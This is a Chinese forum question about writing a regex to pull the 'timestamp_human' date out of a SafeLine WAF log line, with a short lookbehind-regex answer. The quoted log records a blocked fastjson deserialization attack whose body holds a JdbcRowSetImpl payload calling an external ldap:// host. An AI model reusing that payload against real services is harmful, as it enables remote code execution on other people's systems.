极客观点
项目管理
HarmonyOS
下面那条log里面有两个日期,如果直接使用日期的正则(例如[1-9]d{3}-(0[1-9]|10|11|12)-(0[1-9]|1-2|30|31) (0-1|2[0-3]):0-5:0-5),就会直接匹配出两个日期,这并不是我想要的。我只想提取timestamp_human后面的那个日期,求各位大佬赐教!
<30>May 8 14:35:17 441f4976dc97 safeline_event[1]:{"action":"deny","attack_type":"code_execution","body":"{\\\"appVer\\\":\\\"1.0.3\\\",\\\"deviceId\\\":\\\"XrTWtSJI0+4DAD\\\\/5ZhCQWALF2020-05-07 15:53:48\\\",\\\"OSType\\\":\\\"IOS\\\",\\\"netType\\\":\\\"WIFI\\\",\\\"h5Ver\\\":\\\"1.0.0\\\",\\\"OSVer\\\":\\\"13.3.1\\\",\\\"deviceModel\\\":\\\"iPhone12,1\\\",\\\"name\\\":{\\\"@type\\\":\\\"java.lang.Class\\\",\\\"val\\\":\\\"com.sun.rowset.JdbcRowSetImpl\\\"},\\\"x\\\":{\\\"@type\\\":\\\"com.sun.rowset.JdbcRowSetImpl\\\",\\\"dataSourceName\\\":\\\"ldap://rrrr.fastjson.vr8y7lon.3cm.me\\\",\\\"autoCommit\\\":true}}","cookie":"","country":"CN","decode_path":"","dest_ip":"192.168.1.1","dest_port":8095,"event_id":"01ca725b28314a19b6a156e60f79307a","host":"apimp.xxx.com","location":"","method":"POST","module":"m_rule","node":"chaitin-safeline","payload":"","protocol":"https","province":"广东","reason":"fastjson 反序列化代码执行","referer":"","req_header_raw":"POST /bh/bhUser/verifyImageCode HTTP/1.1\\r\\nHost: apimp.xxx.com:8095\\r\\nAccept: */*\\r\\nappVerGray: 1.0.3\\r\\npkVer: 1.0\\r\\nrequestId: DAD2B6087A734065A4D637024E34A915\\r\\nAccept-Language: zh-cn\\r\\nAccept-Encoding: gzip, deflate\\r\\nContent-Type: application/json\\r\\ngrayMark: NO\\r\\nUser-Agent: xxxx\\r\\ndeviceInfo: eyJhcHBWZXIiOiIxLjAuMyIsImRldmljZUlkIjoiWHJUV3RTSkkwKzREQURcLzVaaENRV0FMRiIsIk9TVHlwZSI6IklPUyIsIm5ldFR5cGUiOiJXSUZJIiwiaDVWZXIiOiIxLjAuMCIsIk9TVmVyIjoiMTMuMy4xIiwiZGV2aWNlTW9kZWwiOiJpUGhvbmUxMiwxIn0=\\r\\nContent-Length: 361\\r\\nConnection: close\\r\\n\\r\\n","resp_body":"","resp_header_raw":"","resp_reason_phrase":"","resp_status_code":"","risk_level":"high","rule_id":"m_rule/887d1820a85a43cfbeee578a02f6a914","selector_id":"","session":"","src_ip":"10.1.1.1","src_port":4547,"timestamp":1588941224,"timestamp_human":"2020-05-08 20:33:44","urlpath":"/bh/bhUser/verifyImageCode","user_agent":"xxxx"}
/(?<="timestamp_human":")\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}/这样试试